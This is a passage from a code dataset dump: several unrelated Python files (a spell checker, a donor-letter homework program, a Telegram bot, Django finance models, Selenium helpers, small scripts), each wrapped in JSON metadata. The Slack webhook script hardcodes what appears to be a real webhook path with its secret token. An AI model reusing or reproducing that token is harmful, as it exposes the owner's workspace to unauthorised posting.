urllib2\nimport enchant\nimport optparse\n\nfrom enchant.tokenize import get_tokenizer\nfrom enchant.tokenize import HTMLChunker\n\n__metaclass__ = type\n\nclass HTMLSpellChecker:\n def __init__(self, lang='en_US'):\n \"\"\"\n Setup tokenizer.\n\n Create a new tokenizer baesd on lang.\n This let's us skip the HTML and only\n care about our contents.\n \"\"\"\n self.lang = lang\n self._dict = enchant.Dict(self.lang)\n self._tk = get_tokenizer(self.lang,\n chunkers=(HTMLChunker,))\n\n def __call__(self, line):\n for word,off in self._tk(line):\n if not self._dict.check(word):\n yield word, self._dict.suggest(word)\n\nif __name__ == '__main__':\n parser = optparse.OptionParser()\n parser.add_option('-u', 
'--url', help=\"URL to Check\")\n    opts, args = parser.parse_args()\n\n    if not opts.url:\n        parser.error(\"URL is required\")\n\n    check = HTMLSpellChecker()\n    lineno = 0\n    for line in urllib2.urlopen(opts.url):\n        lineno += 1 # count once per line read, so the reported line numbers are real\n        for word,suggestions in check(line):\n            print(\"error on line %d (%s) on page %s. Did you mean:\\n\\t%s\" % \\\n                (lineno, word, opts.url, ', '.join(suggestions)))\n","sub_path":"algorithm_python/forreal/logparser/html_spelling_check.py","file_name":"html_spelling_check.py","file_ext":"py","file_size_in_byte":1264,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"21900376","text":"import os\ndonors = []\n\n\ndef menu():\n    global donors\n    os.system('clear')\n    choice = input(\"\\n\\\nChoose from the following: \\n\\\nT - Send a (T)hank you \\n\\\nR - Create a (R)eport \\n\\\nquit - Quit the program \\n\\\n> \")\n    if(choice == 'T' or choice == 't'):\n        thank_you_name()\n    elif(choice == 'R' or choice == 'r'):\n        create_report()\n    elif(choice == 'quit'):\n        quit()\n\n\ndef thank_you_name():\n    \"\"\"Executed when 'T' is chosen in the menu function.\n    Prompts the user for a name: 'quit' returns to the main menu, 'list'\n    prints all previous donors, and a name starts a thank-you letter.\n    Once a name is entered it asks for a donation amount and prints the letter.\"\"\"\n    global donors\n    while True:\n        os.system('clear')\n        name = input(u\"\\n\\\nPlease enter a name or choose from the following: \\n\\\nlist - Print a list of previous donors\\n\\\nquit - Return to main menu \\n\\\n> \")\n        if(name == 'quit'):\n            return\n        # If name is 'list' the loop neither breaks nor returns\n        # to the main menu\n        elif(name == 'list'):\n            os.system('clear')\n            print(\"List of Names\")\n            print(\"-------------\")\n            sorted_name = sort_by_name()\n            for donor in sorted_name:\n                print(donor[0])\n            input(u\"\\nPress enter to continue...\")\n        elif(name.replace(' ', '').isalpha()):\n            break\n    # If the loop breaks, name is neither 'quit' nor 'list'\n    name = name.title()\n    # Check whether the donor already exists and get the matching index\n    contains_and_index = contains_index(name)\n    contains, index = contains_and_index[0], contains_and_index[1]\n    if(not contains):\n        donors.append([name, 0, 0])\n    # Add donation\n    donation = add_donation(index)\n    if(donation == 'quit'):\n        return\n    # Print a letter\n    create_a_letter(name, donation)\n\n\ndef add_donation(index):\n    \"\"\"\n    This function adds a donation to the donor list\n    \"\"\"\n    os.system('clear')\n    global donors\n    while True:\n        amount = input(u\"\\nPlease enter the donation amount or 'quit': \")\n        if(amount == 'quit'):\n            return amount\n        elif(is_number(amount)):\n            # amount is rounded to 2 decimal places\n            amount = float(\"{0:.2f}\".format(float(amount)))\n            donors[index][1] += amount\n            donors[index][2] += 1\n            return amount\n\n\ndef create_a_letter(name, donation):\n    \"\"\"\n    This function prints a \"Thank you\" letter\n    \"\"\"\n    os.system('clear')\n    print(u\"\\n\\\nDear %s, \\n\\\n\\n\\\n    Thank you so much for your kind donation of $%.2f. We here at the\\n\\\nFoundation for Everyone Needs Potato Salad greatly appreciate it. 
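# ------------------------------------------------------------------------------
# Illustrative aside (a hedged sketch, not part of the files above): the
# pyenchant pieces html_spelling_check.py builds on. get_tokenizer() yields
# (word, offset) pairs, and passing HTMLChunker makes it skip markup so only
# page text is spell-checked. Shown as Python 3 for brevity; the script above
# targets Python 2 (urllib2, optparse).
import enchant
from enchant.tokenize import get_tokenizer, HTMLChunker

d = enchant.Dict("en_US")
tk = get_tokenizer("en_US", chunkers=(HTMLChunker,))
for word, offset in tk("<p>Some mispeled text</p>"):
    if not d.check(word):
        print(word, d.suggest(word)[:3])
# ------------------------------------------------------------------------------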
You \\n\\\nmoney will go towards researching the best way for everyone in the world\\n\\\nto enjoy potato salad.\\n\\\n\\n\\\nThanks again,\\n\\\n\\n\\\nChong Park\\n\\\n\\n\\\nDirector, Foundation for Everyone Needs Potato Salad\\n\\n\\n\" % (name, donation))\n # Exception check for quitting after printing the letter\n # This was added to pass the test_mailroom.py\n exception = input(\"Press Enter to continue....\")\n if(exception == 'quit'):\n quit()\n\n\ndef contains_index(name):\n \"\"\"\n Returns True, and index, if name is contained in the donors list.\n Returns False, and last index if name is not contained in the donors list\n \"\"\"\n global donors\n contains = False\n index = 0\n for donor in donors:\n if(donor[0] == name):\n contains = True\n break\n index += 1\n print([contains, index])\n return [contains, index]\n\n\ndef create_report():\n \"\"\"\n Executed when R is pressed in the main menu.\n It creates a report in table format.\n Items on the columns are joined by tabs to create a tabular\n table. The tab-ing is determined by the length of variable in the\n column.\n Format follows:\n Name |Total |# |Average Donation\n -----------------------------------------------------------\n 1234567890123456|1234567890123456|12345678|12345....\n Example Name |1000.00 |2 |500.00\n where number is how many spaces are in each column\n \"\"\"\n os.system('clear')\n global donors\n # Using variable tab and tab2 as tabs for spacing\n tab = \"\\t|\"\n tab2 = \"\\t\\t|\"\n s_l = sort_by_donation()\n # newlist will hold the string values for each row of donor information\n newlist = []\n for x in s_l:\n # avg is calculated by total donation / # of donation\n # it will get float with 2 decimal values\n avg = '%.2f' % (float(x[1]) / x[2])\n # row holds list of each items of donor info.\n # row = [name, total, # donation, avg]\n row = [x[0], '%.2f' % x[1], str(x[2]), str(avg)]\n # Below is tabbing for correct tab space depends on length of the name\n # or donation amount. Max char per name and total donation\n # is 16. 
It will only account for that much tabbing at the moment\n if(len(row[0]) > 7):\n r_i = [(tab).join(row[:2]), (tab).join(row[2:])]\n else:\n r_i = [(tab2).join(row[:2]), (tab).join(row[2:])]\n if(len(row[1]) >= 7):\n row_items = (tab).join(r_i)\n else:\n row_items = (tab2).join(r_i)\n newlist.append(row_items)\n\n col = [\"Name\", \"Total\", \"#\", \"Average Donation\"]\n subtopic = [(tab2).join(col[:2]), (tab).join(col[2:])]\n columns = (tab2).join(subtopic)\n print(columns)\n print(\"-----------------------------------------------------------\")\n for items in newlist:\n print(items)\n print(\"\\n\\n\\n\")\n # Exception check for quitting after printing the letter\n # This was added to pass the test_mailroom.py\n exception = input(\"Press Enter to continue....\")\n if(exception == 'quit'):\n quit()\n\n\ndef sort_by_donation():\n \"\"\"\n Sorts donors list to a new list in order of most to least donation\n This sorting algorithm uses insertion method.\n \"\"\"\n global donors\n # s_l is short hand for sorted_list\n # d is short hand for single donor in donors\n # s_i is short hand for sorted index\n s_l = []\n for d in donors:\n # d is short hand for sorted_list\n if(len(s_l) == 0):\n sorted_i = 0\n else:\n # current d's total donation is greater than the 1st value in\n # sorted_list's total donation\n if(d[1] >= s_l[0][1]):\n sorted_i = 0\n # current d's total donation is less than the last value in\n # sorted_list's total donation\n elif(d[1] < s_l[-1][1]):\n sorted_i = len(s_l)\n # otherwise, look for index where d's total donation can squeen\n # in between\n else:\n i = 0\n while (i < len(s_l) - 1):\n if(s_l[i][1] <= d[1] and s_l[i + 1][1] > d[1]):\n sorted_i = i + 1\n break\n i += 1\n s_l.insert(sorted_i, d)\n return s_l\n\n\ndef sort_by_name():\n \"\"\"\n Sorts donors list to a new list in alphabetical order of the name\n This sorting algorithm uses insertion method.\n \"\"\"\n # s_l is short hand for sorted_list\n # d is short hand for single donor in donors\n # s_i is short hand for sorted index\n global donors\n s_l = []\n for d in donors:\n if(len(s_l) == 0):\n sorted_i = 0\n else:\n # current d's name is less than the 1st value in\n # sorted_list's name\n if(d[0] < s_l[0][0]):\n sorted_i = 0\n # current d's name is bigger than the last value in\n # sorted_list's name\n elif(d[0] > s_l[-1][0]):\n sorted_i = len(s_l)\n # otherwise, look for index where d's name can squeeze\n # in between\n else:\n i = 0\n while(i < len(s_l) - 1):\n if(s_l[i][0] < d[0] and s_l[i + 1][0] > d[0]):\n sorted_i = i + 1\n break\n i += 1\n s_l.insert(sorted_i, d)\n return s_l\n\n\ndef is_number(n):\n \"\"\"\n Returns true if given string n is a float number\n Ex. 
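# ------------------------------------------------------------------------------
# Illustrative aside (a hedged sketch, not part of mailroom.py): the two
# sort_by_* helpers above hand-roll insertion sort. The standard library gives
# the same orderings in one call; `donors` is a list of [name, total, count]
# entries, as in this file.
def sort_by_donation_sorted(donors):
    # descending by total donated (index 1)
    return sorted(donors, key=lambda d: d[1], reverse=True)

def sort_by_name_sorted(donors):
    # ascending, alphabetical by name (index 0)
    return sorted(donors, key=lambda d: d[0])
# ------------------------------------------------------------------------------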
If n=\"12.34\" it will return True\n \"\"\"\n try:\n float(n)\n return True\n except ValueError:\n return False\n\nprint(\"Welcome to Mailroom Madness\")\nwhile True:\n menu()\n","sub_path":"hw/hw11/mailroom.py","file_name":"mailroom.py","file_ext":"py","file_size_in_byte":8445,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"408451726","text":"import telegram\nfrom flask import Flask, request\nfrom telegram.ext import Dispatcher, MessageHandler, Filters, CommandHandler\nimport os\n\nfrom module_globalVar import globalVar\nglobalVar._init()\n\nfrom module_nlp.snowNLP import *\nfrom module_cmdHandler.cmdHandler import *\n\nTOKEN = os.environ[\"TOKEN\"]\nPORT = int(os.environ.get('PORT', '5000'))\n\nglobalVar.set_value(\"SENTIMENT_ANALYSIS\", True)\n\nbot = telegram.Bot(token=TOKEN)\napp = Flask(__name__)\n\n@app.route('/hook', methods=['POST'])\ndef webhook_handler():\n \"\"\"Set route /hook with POST method will trigger this method.\"\"\"\n if request.method == \"POST\":\n update = telegram.Update.de_json(request.get_json(force=True), bot)\n\n # Update dispatcher process that handler to process this message\n dispatcher.process_update(update)\n return 'ok'\n\ndef reply_handler(bot, update):\n \"\"\"Reply message.\"\"\"\n text = update.message.text\n user_id = update.message.from_user.id\n if globalVar.get_value(\"SENTIMENT_ANALYSIS\", True):\n textSenti = sentimentAnalysis(text)\n if textSenti:\n update.message.reply_text(textSenti)\n else:\n update.message.reply_text(text)\n\n# New a dispatcher for bot\ndispatcher = Dispatcher(bot, None)\n\n# Add handler for handling message, there are many kinds of message. For this handler, it particular handle text\n# message.\ndispatcher.add_handler(CommandHandler(\"sentiment_analysis_start\", sentimentAnalysisStart))\ndispatcher.add_handler(CommandHandler(\"sentiment_analysis_stop\", sentimentAnalysisStop))\ndispatcher.add_handler(CommandHandler(\"murmur\", sendMurmur))\ndispatcher.add_handler(CommandHandler(\"fetch_music\", fetchMusic, pass_args=True))\ndispatcher.add_handler(MessageHandler(Filters.text, reply_handler))\n\nif __name__ == \"__main__\":\n # Running server\n app.run(port = PORT, host='0.0.0.0')","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":1839,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"507391076","text":"import sys\nimport httplib\nimport json\nimport datetime\n\n\ndef eventHandler(event, context, callback):\n callback[\"result\"] = \"node1\"\n conn = httplib.HTTPSConnection(\"hooks.slack.com\")\n l_dumps_content = \"init node = node1\"\n l_payload_webhook = {\"text\": l_dumps_content}\n params = json.dumps(l_payload_webhook)\n print(params)\n\n conn.request(\n \"POST\", \"/services/T1P5CV091/B1PV8CWHX/NEB7M8Y0A5OO7SctSxntHdZt\", params)\n\n response2 = conn.getresponse()\n print(str(response2))\n","sub_path":"slack1.py","file_name":"slack1.py","file_ext":"py","file_size_in_byte":503,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"309491174","text":"import uuid\nfrom django.core.exceptions import ValidationError\nfrom django.db import models\nfrom django.contrib import admin\nfrom finance.services.atrium_api import AtriumApi\nfrom django.apps import apps\nfrom django.db import transaction\nfrom django.db.models.signals import post_save\nfrom django.dispatch import receiver\nfrom web.models import ActiveModel, 
ActiveManager\n\n\nclass AccountManager(ActiveManager):\n @transaction.atomic\n def create_or_update_accounts(self, user_guid, l):\n \"\"\"\n Input: all user accounts from atrium API.\n\n TODO: pagination.\n Before passing accounts, should collect\n all of them for each user.\n \"\"\"\n for acc in l:\n self.create_or_update_account(acc)\n\n def create_or_update_account(self, api_response):\n \"\"\"\n api_response is dictionary with response result.\n If account is deleted in Donkies (is_active=False), do not process.\n \"\"\"\n Member = apps.get_model('finance', 'Member')\n d = api_response\n d.pop('user_guid')\n d.pop('institution_code')\n d['member'] = Member.objects.get(guid=d.pop('member_guid'))\n\n m_fields = self.model._meta.get_fields()\n m_fields = [f.name for f in m_fields]\n\n d = {k: v for (k, v) in d.items() if k in m_fields}\n\n try:\n acc = self.model.objects.get(guid=d['guid'])\n if not acc.is_active:\n return None\n acc.__dict__.update(d)\n except self.model.DoesNotExist:\n acc = self.model(**d)\n acc.save()\n return acc\n\n def get_atrium_accounts(self, user_guid):\n \"\"\"\n Queries atrium API for user's accounts.\n TODO: processing errors.\n \"\"\"\n per_page = 100\n\n a = AtriumApi()\n res = a.get_accounts(user_guid, records_per_page=per_page)\n return res['accounts']\n\n def get_accounts(self, user_guid):\n \"\"\"\n Returns user accounts from database.\n \"\"\"\n return self.model.objects.active().filter(\n member__user__guid=user_guid)\n\n def debit_accounts(self):\n return self.model.objects.active().filter(type_ds=self.model.DEBIT)\n\n def debt_accounts(self):\n return self.model.objects.active().filter(type_ds=self.model.DEBT)\n\n @transaction.atomic\n def set_funding_source(self, account_id):\n \"\"\"\n Set debit account as funding source for user.\n Account should exist in FundingSource.\n \"\"\"\n FundingSource = apps.get_model('bank', 'FundingSource')\n account = self.model.objects.get(\n id=account_id, type_ds=self.model.DEBIT)\n\n if not FundingSource.objects.filter(account=account).exists():\n message = 'Attempt to set \"is_funding_source_for_transfer\" '\n message += 'for account that not exists in bank.FundingSource.'\n raise ValidationError(message)\n\n self.model.objects.active().filter(\n member__user=account.member.user)\\\n .update(is_funding_source_for_transfer=False)\n account.is_funding_source_for_transfer = True\n account.save()\n return account\n\n def set_account_number(self, account_id, account_number):\n \"\"\"\n Can set account only if didn't set before.\n Used for debt accounts.\n \"\"\"\n account = self.model.objects.get(id=account_id)\n if account.account_number is not None:\n raise ValidationError('Account number was set earlier.')\n\n account.account_number = account_number\n account.save()\n\n @transaction.atomic\n def change_active(self, account_id, is_active):\n \"\"\"\n is_active = True - besides account itself,\n activates also all transactions.\n is_active = False - besides account itself,\n deactivates also all transactions.\n \"\"\"\n Transaction = apps.get_model('finance', 'Transaction')\n self.model.objects.filter(id=account_id)\\\n .update(is_active=is_active)\n Transaction.objects.filter(account_id=account_id)\\\n .update(is_active=is_active)\n\n\nclass Account(ActiveModel):\n \"\"\"\n type - Atrium MX type.\n type_ds - Donkies type.\n \"\"\"\n CHECKING = 'CHECKING'\n SAVINGS = 'SAVINGS'\n CASH = 'CASH'\n PREPAID = 'PREPAID'\n LOAN = 'LOAN'\n CREDIT_CARD = 'CREDIT_CARD'\n LINE_OF_CREDIT = 'LINE_OF_CREDIT'\n MORTGAGE = 
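# ------------------------------------------------------------------------------
# Illustrative aside (hedged, not part of account.py): the manual get/update in
# create_or_update_account above is close to what Django ships as
# update_or_create; the `defaults` keys here are illustrative only:
#     acc, created = Account.objects.update_or_create(
#         guid=d['guid'],
#         defaults={'name': d.get('name'), 'balance': d.get('balance')},
#     )
# The hand-written version is still needed in this file because it must also
# skip rows whose is_active flag is False and trim the dict to model fields.
# ------------------------------------------------------------------------------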
'MORTGAGE'\n INVESTMENT = 'INVESTMENT'\n PROPERTY = 'PROPERTY'\n\n DEBIT_TYPES = (CHECKING, SAVINGS, CASH, PREPAID)\n DEBT_TYPES = (LOAN, CREDIT_CARD, LINE_OF_CREDIT, MORTGAGE)\n INVESTMENT_TYPES = (INVESTMENT, PROPERTY)\n\n DEBIT = 'debit'\n DEBT = 'debt'\n INVESTMENT = 'investment'\n OTHER = 'other'\n\n TYPE_DS_CHOICES = (\n (DEBIT, 'debit'),\n (DEBT, 'debt'),\n (INVESTMENT, 'investment'),\n (OTHER, 'other'))\n\n member = models.ForeignKey('Member', related_name='accounts')\n guid = models.CharField(max_length=100, unique=True)\n uid = models.CharField(max_length=50, unique=True)\n name = models.CharField(max_length=255, null=True, default=None)\n apr = models.DecimalField(\n max_digits=10,\n decimal_places=6,\n help_text='Annual Percentage Rate.',\n null=True,\n default=None)\n apy = models.DecimalField(\n max_digits=10,\n decimal_places=6,\n help_text='Annual Percentage Yield.',\n null=True,\n default=None)\n available_balance = models.DecimalField(\n max_digits=14,\n decimal_places=2,\n help_text='The current available account balance.',\n null=True,\n default=None)\n available_credit = models.DecimalField(\n max_digits=10,\n decimal_places=2,\n help_text='The current available credit balance of the account.',\n null=True,\n default=None)\n balance = models.DecimalField(\n max_digits=14,\n decimal_places=2,\n help_text='The current Account Balance.',\n null=True,\n default=None)\n created_at = models.DateTimeField(null=True, default=None)\n day_payment_is_due = models.IntegerField(null=True, default=None)\n is_closed = models.BooleanField(default=False)\n credit_limit = models.DecimalField(\n max_digits=10,\n decimal_places=2,\n help_text='The credit limit for the account.',\n null=True,\n default=None)\n interest_rate = models.DecimalField(\n max_digits=10,\n decimal_places=6,\n help_text='Interest rate, %',\n null=True,\n default=None)\n last_payment = models.DecimalField(\n max_digits=10,\n decimal_places=2,\n help_text='Amount of the account\\'s last payment.',\n null=True,\n default=None)\n last_payment_at = models.DateTimeField(null=True, default=None)\n matures_on = models.DateTimeField(null=True, default=None)\n minimum_balance = models.DecimalField(\n max_digits=14,\n decimal_places=2,\n help_text='Minimum required balance.',\n null=True,\n default=None)\n minimum_payment = models.DecimalField(\n max_digits=10,\n decimal_places=2,\n help_text='Minimum payment.',\n null=True,\n default=None)\n original_balance = models.DecimalField(\n max_digits=14,\n decimal_places=2,\n help_text='Original balance.',\n null=True,\n default=None)\n payment_due_at = models.DateTimeField(null=True, default=None)\n payoff_balance = models.DecimalField(\n max_digits=14,\n decimal_places=2,\n help_text='Payoff Balance',\n null=True,\n default=None)\n started_on = models.DateTimeField(null=True, default=None)\n subtype = models.CharField(max_length=255, null=True, default=None)\n total_account_value = models.DecimalField(\n max_digits=14,\n decimal_places=2,\n help_text='The total value of the account.',\n null=True,\n default=None)\n type = models.CharField(max_length=100, null=True, default=None)\n type_ds = models.CharField(\n max_length=15,\n help_text='Internal type',\n choices=TYPE_DS_CHOICES,\n default=OTHER)\n updated_at = models.DateTimeField(null=True, default=None)\n transfer_share = models.IntegerField(\n default=0,\n help_text=(\n 'For debt accounts in percentage. 
'\n 'Share of transfer amount between debt accounts.'\n 'The total share of all accounts should be 100%.'\n )\n )\n is_funding_source_for_transfer = models.BooleanField(\n default=False,\n help_text='For debit account. Funding source for transfer.')\n account_number = models.CharField(\n max_length=100, null=True, default=None, blank=True,\n help_text='For debt accounts only. Set by user.')\n\n objects = AccountManager()\n\n class Meta:\n app_label = 'finance'\n verbose_name = 'account'\n verbose_name_plural = 'accounts'\n ordering = ['type_ds', 'member', 'name']\n\n def __str__(self):\n s = self.member.name\n if self.name:\n s += ' {}'.format(self.name)\n s += ' ({})'.format(self.member.user.email)\n return s\n\n @property\n def funding_source(self):\n \"\"\"\n Returns associated funding source or None.\n \"\"\"\n FundingSource = apps.get_model('bank', 'FundingSource')\n return FundingSource.objects.filter(account=self).first()\n\n @property\n def is_dwolla_created(self):\n fs = self.funding_source\n if fs is None:\n return False\n if fs.dwolla_id is None:\n return False\n return True\n\n def save(self, *args, **kwargs):\n \"\"\"\n Assume that account can not change type.\n For example: debt account can not be debit.\n If account can change type: TODO handle this.\n \"\"\"\n if not self.pk:\n self.type_ds = self.get_ds_type()\n self.uid = uuid.uuid4().hex\n super().save(*args, **kwargs)\n\n def get_ds_type(self):\n if self.type in self.DEBIT_TYPES:\n return self.DEBIT\n if self.type in self.DEBT_TYPES:\n return self.DEBT\n if self.type in self.INVESTMENT_TYPES:\n return self.INVESTMENT\n return self.OTHER\n\n\n@receiver(post_save, sender=Account)\ndef apply_transfer_share(sender, instance, created, **kwargs):\n \"\"\"\n If user adds first debt account, set transfer_share to 100%.\n \"\"\"\n if instance.type_ds == Account.DEBT:\n qs = Account.objects.active().filter(\n member__user=instance.member.user, type_ds=Account.DEBT)\n if qs.count() == 1:\n Account.objects.active().filter(\n id=instance.id).update(transfer_share=100)\n\n\n@admin.register(Account)\nclass AccountAdmin(admin.ModelAdmin):\n list_display = (\n 'name',\n 'member',\n 'type_ds',\n 'guid',\n 'available_balance',\n 'available_credit',\n 'balance',\n 'credit_limit',\n 'original_balance',\n 'payoff_balance',\n 'account_number'\n )\n\n def has_delete_permission(self, request, obj=None):\n return False\n","sub_path":"donkies/finance/models/account.py","file_name":"account.py","file_ext":"py","file_size_in_byte":11257,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"50496881","text":"import sys\nsys.path.append(\"..\")\nfrom selenium.webdriver.common.keys import Keys\nimport os,random,configparser\nimport datetime\nfrom common import variable\n\ndef randomChar(n):\n '''获取n个字符'''\n temp = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789'\n list = random.sample(temp, n)\n result=''\n for i in list:\n result = result+i\n return result\n \ndef getDateTime(t=0):\n '''获取日期如:2017-06-12\n 默认为当前日期。t>0表示超前t天,t<0表示后退t天'''\n today = datetime.date.today()\n day = datetime.timedelta(days=t)\n return str(today+day)\n \ndef lenChar(driver, element):\n ##返回输入框数据长度\n ele = driver.find_element(element)\n return len(ele.get_attribute('value'))\n \ndef lenJudge(driver, element, lenn):\n ##输入框内数据长度判断\n ele = driver.find_element(element)\n lene = len(ele.get_attribute('value'))\n if lene==lenn:\n return True\n else:\n return False\n \ndef getChar(name, lenn=0):\n #返回指定长度的字符串\n if 
lenn <= 0:\n        return name\n    else:\n        temp = name\n        while(len(temp) < lenn):\n            temp = temp + name\n        return temp[:lenn]\n\ndef charEx(ex='all'):\n    '''Return a string of special characters: 'en' for ASCII symbols, 'cn' for full-width Chinese symbols, 'all' for both'''\n    charexen = \"~!@#$%^&*()_+{}|:<>?\"\n    charexcn = \"·~!#¥%……&*()——+【】;’、:“|,。、《》?\"\n    if ex=='all':\n        charex = charexen + charexcn\n        return charex\n    elif ex=='en':\n        return charexen\n    elif ex=='cn':\n        return charexcn\n\ndef insert_img(driver,file_name):\n    base_dir = os.path.dirname(os.path.dirname(__file__))\n    base_dir = str(base_dir)\n    base_dir = base_dir.replace('\\\\','/')\n    base = base_dir.split('test_case')[0]\n    file_path = base+'report/image/'+file_name\n    driver.get_screenshot_as_file(file_path)\n\n\ndef new_window(driver,windowName,url=''):\n    '''Open a new browser tab; if url is given, load it. The new tab becomes the active one and is recorded in variable.Tabs'''\n    allhandles1 = driver.window_handles\n    while(1):\n        if variable.Driver==\"Firefox\":\n            js='window.open(\"\");'\n            driver.execute_script(js)\n        elif variable.Driver==\"Chrome\":\n            driver.find_element_by_tag_name('body').send_keys(Keys.CONTROL + 't')\n        allhandles2 = driver.window_handles\n        if len(allhandles2)>len(allhandles1):\n            break\n    new_window = 'None'\n    for new_window in allhandles2:\n        for handle in allhandles1:\n            if new_window == handle:\n                # new_window is in allhandles1, so it is not the tab we just opened\n                new_window= 'None'\n                break\n        if new_window != 'None':\n            # found the tab we just opened\n            break\n    driver.switch_to_window(new_window)\n    variable.Tabs[windowName] = new_window\n    if url!='':\n        driver.get(url)\n\ndef new_report(testreport):\n    lists = os.listdir(testreport)\n    lists.sort(key=lambda fn : os.path.getmtime(testreport + '\\\\' + fn))\n    file_new = os.path.join(testreport,lists[-1])\n    return file_new\n\ndef isElementExist(driver,element_loc):\n    '''Return True if the element can be located, otherwise False'''\n    try:\n        driver.find_element(*element_loc)\n        return True\n    except:\n        return False\n\ndef read_ini():\n    config = configparser.ConfigParser()\n    #config.readfp(open('config.ini','wb'))\n    conf_file = os.getcwd()+r'\\data'\n    config.read(conf_file+r'\\config.ini')\n\n    variable.Driver = config.get(\"config\",\"Driver\")\n    variable.ENVI = config.get(\"config\",\"RunningEnvironment\")\n    variable.StartUp_Mode = config.get(\"config\",\"BootMode\")\n    variable.UserName = config.get(\"config\",\"UserName\")\n    variable.Password = config.get(\"config\",\"Password\")\n    variable.PublicationType = config.get(\"config\",\"PublicationType\")\n    variable.BookName = config.get(\"config\",\"BookName\")\n    variable.BookNum = config.get(\"config\",\"BookNum\")\n    \ndef isbn():\n    '''Return the five parts of a random ISBN-13 as a list: [prefix, group, registrant, publication, check digit]'''\n    isbn1 = random.choice([978,979])\n    isbn2 = random.randint(1,9)\n    isbn3 = random.randint(1000,9999)\n    isbn4 = random.randint(1000,9999)\n    # ISBN-13 check digit: weight the 12 digits alternately 1,3,1,3,... then check = (10 - sum % 10) % 10\n    isbn5 = int(isbn1/100)+int((isbn1%100)/10)*3+isbn1%10+isbn2*3+int(isbn3/1000)+int((isbn3%1000)/100)*3+int((isbn3%100)/10)+(isbn3%10)*3+int(isbn4/1000)+int((isbn4%1000)/100)*3+int((isbn4%100)/10)+(isbn4%10)*3\n    isbn5 = isbn5%10\n    isbn5 = 10 - isbn5\n    if isbn5==10:\n        isbn5=0\n    isbn=[isbn1,isbn2,isbn3,isbn4,isbn5]\n    return isbn\n\ndef cn():\n    cn1 = str(random.randint(0,9))+str(random.randint(0,9))\n    cn2 = str(random.randint(0,9))+str(random.randint(0,9))+str(random.randint(0,9))+str(random.randint(0,9))\n    cn3 = random.choice('ABCDEFGHIJKLMNOPQRSTUVWXYZ')\n    cn = [cn1,cn2,cn3]\n    return cn\n\nif __name__ == '__main__':\n    print(getDateTime())\n    print(randomChar(6))\n","sub_path":"ISLI_RA/common/function.py","file_name":"function.py","file_ext":"py","file_size_in_byte":4872,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"615292182","text":"##Variables\r\npmt = int(input(\"Starting balance: \"))\r\nstart_pmt = pmt\r\nbeg = int(input(\"Starting interest rate: \"))\r\nend = int(input(\"Ending interest rate: \"))\r\ntime = 
int(input(\"Number of years: \"))\r\n# interest rates from beg% to end%, as decimal fractions\r\nlst1 = [r / 100.0 for r in range(beg, end + 1)]\r\ncounter = 1\r\n\r\n##Logic\r\nfor i in lst1:\r\n    print(\"Interest rate of \"+str(i*100)+\" %:\")\r\n    while counter <= time:\r\n        pmt = pmt + (pmt * i)\r\n        print(\"Balance after year \"+str(counter)+\" is $ \"+str(round(pmt,2)))\r\n        counter += 1\r\n    counter = 1\r\n    pmt = start_pmt  # reset to the balance the user entered, not a hard-coded 1000\r\n    print(\"\\n\")\r\n","sub_path":"Assignment 11/Assignment 11.3.b.py","file_name":"Assignment 11.3.b.py","file_ext":"py","file_size_in_byte":523,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"244765946","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nThe script that prepares the environment: copies files where they belong in order to\nbe accessible in the repo, and archives the 500 MB GooseFieldForageData\nCreated on Tue Apr 14 13:04:21 2020\n\n@author: andrey\n\"\"\"\nimport shutil \nimport os\nimport errno\nimport distutils.dir_util\nimport zlib\nimport bz2 # Use bz2 or zlib at work\nimport lzma # Use LZMA at home, where internet connection is bad\nimport zipfile\ndata_dir = \"~/CLionProjects/GooseTests/run-directory1/\"\n#source_dir = \"~/CLionProjects/ALMaSS_all\"\nfield_dir =\"~/CLionProjects/GooseTests/ALMaSS_inputs\"\n\ndata_dir_new =os.path.dirname(__file__)+\"/rundir\"\nwith open(\"filelistdata\") as fp:\n    datafileslist=fp.readlines()\n\ndatafileslist = [x.strip() for x in datafileslist] \n\n#source_dir_new =os.path.dirname(__file__)+ \"/source\"\nfield_dir_new =os.path.dirname(__file__)+ \"/fielddir\"\nfor j in [data_dir_new, field_dir_new]:\n    try:\n        os.mkdir(j)  # create every directory in the list; breaking out after the first would skip the rest\n    except OSError as error:\n        if error.errno != errno.EEXIST:\n            raise\n        else:\n            print(j+\" Directory exists: Ignoring\")\n    \nfor i in datafileslist:\n    if i == \"GooseFieldForageData.txt\":\n        cwd_s = os.getcwd()\n        os.chdir(os.path.expanduser(data_dir+\"/\"))\n        zipObj = zipfile.ZipFile(os.path.expanduser(data_dir_new+\"/\"+i+\".gz\"), 'w', compression=zipfile.ZIP_BZIP2) #ZIP_LZMA ZIP_BZIP2 ZIP_DEFLATED\n        zipObj.write(os.path.expanduser(i))\n        zipObj.close()\n        os.chdir(cwd_s)\n    else:\n        shutil.copy2(os.path.expanduser(data_dir+\"/\"+i), data_dir_new)\n#distutils.dir_util.copy_tree(os.path.expanduser(source_dir), source_dir_new)\ndistutils.dir_util.copy_tree(os.path.expanduser(field_dir), field_dir_new)\n\n\n","sub_path":"prepare_env.py","file_name":"prepare_env.py","file_ext":"py","file_size_in_byte":1787,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"221604070","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n    dependencies = [\n        ('dra', '0010_auto_20160122_1610'),\n    ]\n\n    operations = [\n        migrations.AlterField(\n            model_name='cpu',\n            name='tasktime',\n            field=models.CharField(help_text=b'tasktime', max_length=50),\n        ),\n    